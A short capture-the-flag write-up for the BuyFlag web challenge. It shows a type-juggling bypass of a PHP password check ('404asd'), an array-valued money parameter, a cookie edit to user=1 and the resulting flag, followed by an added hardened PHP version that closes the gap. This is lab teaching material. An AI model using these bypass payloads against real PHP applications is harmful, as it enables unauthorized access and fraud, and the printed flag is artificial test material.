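3X01 Challenge - [极客大挑战 2019]BuyFlag
After opening the site, inspecting it with F12 revealed pay.php and index.php.
pay.php is the page for buying the flag:
Next, a snippet of PHP code turned up in a comment: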
<!--
~~~post money and password~~~
if (isset($_POST['password'])) {
    $password = $_POST['password'];
    if (is_numeric($password)) {
        echo "password can't be number</br>";
    } elseif ($password == 404) {
        echo "Password Right!</br>";
    }
}
-->
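Open HackBar and send the parameters by POST. 404asd is not numeric, so it gets past is_numeric(), while the loose comparison == 404 still matches on PHP versions before 8:
password=404asd&money[]=1
Also change the cookie to user=1.
With that, the flag is purchased successfully: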
flag{f35a2816-1c80-4dfc-bf9b-8266d2603d19}
Note:
If the value is too long, you can use scientific notation, or you can use money[]=123.
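An added example, not part of the original writeup or the challenge's code: the password check from the page comment next to a stricter version that closes the type-juggling gap. EXPECTED_PASSWORD, FLAG_PRICE and the whole money validation are assumptions, since the page does not show the server's money check.

```php
<?php
declare(strict_types=1);

// Hypothetical values: the page does not show the real secret or price.
const EXPECTED_PASSWORD = '404';
const FLAG_PRICE = 1000;

// Check from the page comment: passes for "404asd" on PHP < 8, because
// == casts the leading-numeric string to the integer 404.
function weak_password_ok($password): bool
{
    return !is_numeric($password) && $password == 404;
}

// Hardened: accept only a string and compare it byte for byte.
function strict_password_ok($password): bool
{
    return is_string($password) && hash_equals(EXPECTED_PASSWORD, $password);
}

// Hardened (assumed design): money must be a plain decimal string, so arrays
// (money[]=1) and scientific notation (1e9) are rejected before comparing.
function strict_money_ok($money): bool
{
    if (!is_string($money) || !ctype_digit($money) || strlen($money) > 9) {
        return false;
    }
    return (int)$money >= FLAG_PRICE;
}

// Constructed sample inputs, shaped like the request in the writeup.
$samples = [
    ['password' => '404asd', 'money' => ['1']],
    ['password' => '404',    'money' => '1e9'],
    ['password' => '404',    'money' => '1000'],
];
foreach ($samples as $post) {
    printf(
        "%-8s weak=%s strict=%s money=%s\n",
        $post['password'],
        var_export(weak_password_ok($post['password']), true),
        var_export(strict_password_ok($post['password']), true),
        var_export(strict_money_ok($post['money']), true)
    );
}
```

The strict version drops the is_numeric() gate entirely, because rejecting numbers and then comparing against a number is what makes the loose comparison the only way to pass.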